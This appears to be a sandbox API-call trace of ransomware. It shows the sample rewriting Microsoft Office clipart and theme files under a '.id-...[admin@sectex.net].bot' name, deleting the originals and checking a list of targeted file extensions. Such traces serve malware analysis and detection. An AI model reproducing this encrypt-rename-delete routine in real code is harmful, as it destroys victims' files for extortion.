	[0140.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.925] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.926] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.928] GetLastError () returned 0x0
	[0140.928] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x107b, lpOverlapped=0x0) returned 1
	[0140.929] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1080, lpOverlapped=0x0) returned 1
	[0140.930] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.930] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.931] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.931] CloseHandle (hObject=0x3a4) returned 1
	[0140.931] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.931] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.933] CloseHandle (hObject=0x3a0) returned 1
	[0140.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.933] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid")) returned 1
	[0140.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.934] lstrlenW (lpString=".doc") returned 4
	[0140.934] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.934] lstrlenW (lpString=".docx") returned 5
	[0140.934] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.934] lstrlenW (lpString=".pdf") returned 4
	[0140.934] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.934] lstrlenW (lpString=".xls") returned 4
	[0140.934] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.934] lstrlenW (lpString=".xlsx") returned 5
	[0140.934] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.934] lstrlenW (lpString=".ppt") returned 4
	[0140.934] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.934] lstrlenW (lpString=".zip") returned 4
	[0140.934] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.934] lstrlenW (lpString=".rar") returned 4
	[0140.934] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.934] lstrlenW (lpString=".bz2") returned 4
	[0140.934] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.934] lstrlenW (lpString=".7z") returned 3
	[0140.934] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.934] lstrlenW (lpString=".dbf") returned 4
	[0140.934] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.934] lstrlenW (lpString=".1cd") returned 4
	[0140.934] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.934] lstrlenW (lpString=".jpg") returned 4
	[0140.934] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.935] lstrlenW (lpString=".doc") returned 4
	[0140.935] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.935] lstrlenW (lpString=".docx") returned 5
	[0140.935] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.935] lstrlenW (lpString=".pdf") returned 4
	[0140.935] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.935] lstrlenW (lpString=".xls") returned 4
	[0140.935] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.935] lstrlenW (lpString=".xlsx") returned 5
	[0140.935] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.935] lstrlenW (lpString=".ppt") returned 4
	[0140.935] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.935] lstrlenW (lpString=".zip") returned 4
	[0140.935] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.935] lstrlenW (lpString=".rar") returned 4
	[0140.935] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.935] lstrlenW (lpString=".bz2") returned 4
	[0140.935] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.935] lstrlenW (lpString=".7z") returned 3
	[0140.935] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.935] lstrlenW (lpString=".dbf") returned 4
	[0140.935] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.935] lstrlenW (lpString=".1cd") returned 4
	[0140.935] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63
	[0140.935] lstrlenW (lpString=".jpg") returned 4
	[0140.935] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.936] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.936] lstrlenW (lpString="SPRNG_01.MID") returned 12
	[0140.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.936] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=6700) returned 1
	[0140.936] CloseHandle (hObject=0x3a0) returned 1
	[0140.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid")) returned 0x20
	[0140.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.937] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.937] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0140.937] GetLastError () returned 0x0
	[0140.937] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x1a2c, lpOverlapped=0x0) returned 1
	[0140.939] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x1a30, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x1a30, lpOverlapped=0x0) returned 1
	[0140.940] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.940] WriteFile (in: hFile=0x3a4, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.940] SetEndOfFile (hFile=0x3a4) returned 1
	[0140.940] CloseHandle (hObject=0x3a4) returned 1
	[0140.941] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.941] SetEndOfFile (hFile=0x3a0) returned 1
	[0140.943] CloseHandle (hObject=0x3a0) returned 1
	[0140.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.943] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sprng_01.mid")) returned 1
	[0140.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.943] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.943] lstrlenW (lpString=".doc") returned 4
	[0140.943] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.943] lstrlenW (lpString=".docx") returned 5
	[0140.943] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.944] lstrlenW (lpString=".pdf") returned 4
	[0140.944] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.944] lstrlenW (lpString=".xls") returned 4
	[0140.944] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.944] lstrlenW (lpString=".xlsx") returned 5
	[0140.944] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.944] lstrlenW (lpString=".ppt") returned 4
	[0140.944] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.944] lstrlenW (lpString=".zip") returned 4
	[0140.944] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.944] lstrlenW (lpString=".rar") returned 4
	[0140.944] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.944] lstrlenW (lpString=".bz2") returned 4
	[0140.944] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.944] lstrlenW (lpString=".7z") returned 3
	[0140.944] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.944] lstrlenW (lpString=".dbf") returned 4
	[0140.944] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.944] lstrlenW (lpString=".1cd") returned 4
	[0140.944] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.944] lstrlenW (lpString=".jpg") returned 4
	[0140.944] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.944] lstrlenW (lpString=".doc") returned 4
	[0140.944] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0140.944] lstrlenW (lpString=".docx") returned 5
	[0140.944] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0140.944] lstrlenW (lpString=".pdf") returned 4
	[0140.944] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0140.945] lstrlenW (lpString=".xls") returned 4
	[0140.945] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0140.945] lstrlenW (lpString=".xlsx") returned 5
	[0140.945] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0140.945] lstrlenW (lpString=".ppt") returned 4
	[0140.945] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0140.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.945] lstrlenW (lpString=".zip") returned 4
	[0140.945] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0140.945] lstrlenW (lpString=".rar") returned 4
	[0140.945] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0140.945] lstrlenW (lpString=".bz2") returned 4
	[0140.945] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0140.945] lstrlenW (lpString=".7z") returned 3
	[0140.945] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0140.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.945] lstrlenW (lpString=".dbf") returned 4
	[0140.945] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0140.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.945] lstrlenW (lpString=".1cd") returned 4
	[0140.945] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0140.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPRNG_01.MID") returned 63
	[0140.945] lstrlenW (lpString=".jpg") returned 4
	[0140.945] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0140.945] lstrcmpiW (lpString1=".MID", lpString2=".bot") returned 1
	[0140.945] lstrlenW (lpString="SUMER_01.MID") returned 12
	[0140.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.946] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=14044) returned 1
	[0140.946] CloseHandle (hObject=0x3a0) returned 1
	[0140.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 0x20
	[0140.946] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0140.946] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.946] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0141.135] GetLastError () returned 0x0
	[0141.137] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x36dc, lpOverlapped=0x0) returned 1
	[0141.154] WriteFile (in: hFile=0x3bc, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x36e0, lpOverlapped=0x0) returned 1
	[0141.155] ReadFile (in: hFile=0x3a0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.155] WriteFile (in: hFile=0x3bc, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.155] SetEndOfFile (hFile=0x3bc) returned 1
	[0141.155] CloseHandle (hObject=0x3bc) returned 1
	[0141.155] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.155] SetEndOfFile (hFile=0x3a0) returned 1
	[0141.157] CloseHandle (hObject=0x3a0) returned 1
	[0141.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.158] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 1
	[0141.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.158] lstrlenW (lpString=".doc") returned 4
	[0141.158] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.158] lstrlenW (lpString=".docx") returned 5
	[0141.158] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.158] lstrlenW (lpString=".pdf") returned 4
	[0141.159] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.159] lstrlenW (lpString=".xls") returned 4
	[0141.159] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.159] lstrlenW (lpString=".xlsx") returned 5
	[0141.159] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.159] lstrlenW (lpString=".ppt") returned 4
	[0141.159] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.159] lstrlenW (lpString=".zip") returned 4
	[0141.159] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.159] lstrlenW (lpString=".rar") returned 4
	[0141.159] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.159] lstrlenW (lpString=".bz2") returned 4
	[0141.159] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.159] lstrlenW (lpString=".7z") returned 3
	[0141.159] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.159] lstrlenW (lpString=".dbf") returned 4
	[0141.159] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.159] lstrlenW (lpString=".1cd") returned 4
	[0141.159] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.159] lstrlenW (lpString=".jpg") returned 4
	[0141.159] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.159] lstrlenW (lpString=".doc") returned 4
	[0141.159] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1
	[0141.159] lstrlenW (lpString=".docx") returned 5
	[0141.159] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1
	[0141.159] lstrlenW (lpString=".pdf") returned 4
	[0141.159] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1
	[0141.159] lstrlenW (lpString=".xls") returned 4
	[0141.160] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1
	[0141.160] lstrlenW (lpString=".xlsx") returned 5
	[0141.160] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1
	[0141.160] lstrlenW (lpString=".ppt") returned 4
	[0141.160] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1
	[0141.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.160] lstrlenW (lpString=".zip") returned 4
	[0141.160] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1
	[0141.160] lstrlenW (lpString=".rar") returned 4
	[0141.160] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1
	[0141.160] lstrlenW (lpString=".bz2") returned 4
	[0141.160] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1
	[0141.160] lstrlenW (lpString=".7z") returned 3
	[0141.160] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1
	[0141.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.160] lstrlenW (lpString=".dbf") returned 4
	[0141.160] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1
	[0141.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.160] lstrlenW (lpString=".1cd") returned 4
	[0141.160] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1
	[0141.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID") returned 63
	[0141.160] lstrlenW (lpString=".jpg") returned 4
	[0141.160] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1
	[0141.160] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0141.160] lstrlenW (lpString="Apex.eftx") returned 9
	[0141.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.235] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=218310) returned 1
	[0141.236] CloseHandle (hObject=0x3ac) returned 1
	[0141.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx")) returned 0x20
	[0141.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apex.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apex.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
